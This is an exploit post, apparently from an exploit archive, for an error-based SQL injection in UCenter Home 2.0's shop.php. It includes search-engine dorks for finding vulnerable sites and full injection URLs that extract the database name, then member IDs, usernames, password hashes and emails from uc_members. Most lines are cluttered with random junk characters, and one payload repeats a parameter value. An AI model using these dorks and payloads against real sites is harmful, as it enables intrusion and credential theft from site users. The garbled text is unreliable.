5 @0 J" A2 _3 ]1 T1 a8 y2 G3 M
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 0 c% ]. I+ w* ]! s; ?
' f/ R# T# ]6 y5 ]7 h7 r2 i $ e* U" x0 ~/ c6 y. J, Z
6 t6 g( l" i5 @4 t" \+ @* E
*/ Author : KnocKout 7 u$ q3 W) l" k1 Q' q
: u$ y% `. Y0 s0 o$ y: r& [* `# c*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
n1 a6 _. P0 {1 A5 L6 |. Y1 \% ?( s. P4 ]" M8 [, }
*/ Contact: knockoutr@msn.com - k9 V7 p, Q! h; s( c% D
( ]! H8 C5 {, K! x
*/ Cyber-Warrior.org/CWKnocKout
2 v) O5 [) R* f/ ~& Z7 T
* P; J! N* { W) @" C# l* }__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ' Z6 y" t" @& V4 \( s6 a
8 t' Q# U8 ~; G$ V
Script : UCenter Home
: i; i5 S+ u) @9 F- j7 ?( [2 |' L+ d6 r: [3 l
Version : 2.0 ) v: W5 C/ F) ^7 |+ t" x
. X( |* ^0 K) M( h5 f3 @' [* W' ~Script HomePage : http://u.discuz.net/
1 ?2 j# A- U& E. w* t3 \$ Q1 h6 Y* ]/ n) k7 S5 K# m( K
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) ?$ [6 U0 R4 @& L' n: w1 B8 s! F. d) \. V( x0 g% @, d/ D( M
Dork : Powered by UCenter inurl:shop.php?ac=view
) G1 v/ @" P! y; s7 ?2 c3 N% l- [
# Q) ~5 G( x" K3 n6 mDork 2 : inurl:shop.php?ac=view&shopid=
9 ?# Y e: |0 X* d& B, D3 Z' z& Q; E; F
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 @; v, N; N! Q% `+ j' l) b* B7 p% P5 \! Q
Vuln file : Shop.php
, H% }0 C# k9 U. n- s4 g1 T! K0 X
8 ~6 N/ ^, z4 h. G' mvalue's : (?)ac=view&shopid=
+ u3 y) u1 @2 [7 q3 I. Q1 b( P! r' h4 J) A3 W2 P
Vulnerable Style : SQL Injection (MySQL Error Based) ) V8 ~& [$ E+ x# u3 S' N' D; q9 x
\& P y1 M' d. E: n4 U/ r
Need Metarials : Hex Conversion
3 S. d" R' D" f6 ]% d) L4 V" i, S0 u0 x \ `# A6 K5 P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; I! P) o5 p6 |+ q$ a+ u1 p2 b" s" P
Your Need victim Database name.
1 N* M' z. `4 |4 |3 L" }3 _
. I2 [+ \; V- J0 s& R- Dfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
* A$ H& \, {! r! n/ S& p
& m, j6 R4 ^/ o, f0 \..
3 W* s5 }+ U; l% @4 ~- c6 `- c n! w( I. Z! K
DB : Okey.
' p& i# I) E8 q e. i# @- A7 h5 m# G/ N; {7 @
your edit DB `[TARGET DB NAME]`
" `0 G! Q) x( J3 a+ w* i- [! v2 H: v; m7 l
Example : 'hiwir1_ucenter'
, J& i5 R; H3 w0 ^
$ ^9 r6 D. ]* o: O: @Edit : Okey.
, ?9 u2 D) M" C6 u( I1 W/ b+ K% G9 P. g7 J0 A. c1 q1 g
Your use Hex conversion. And edit Your SQL Injection Exploit..
3 J& m) U% Z4 X5 ]- V- S- v; b6 j& x+ B* A, ~: t3 K; e
, u; c' f- j2 d8 d! B$ t0 z
5 X/ x f) t3 ]- w i4 n7 C
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
9 ?" a9 {! N. p/ G |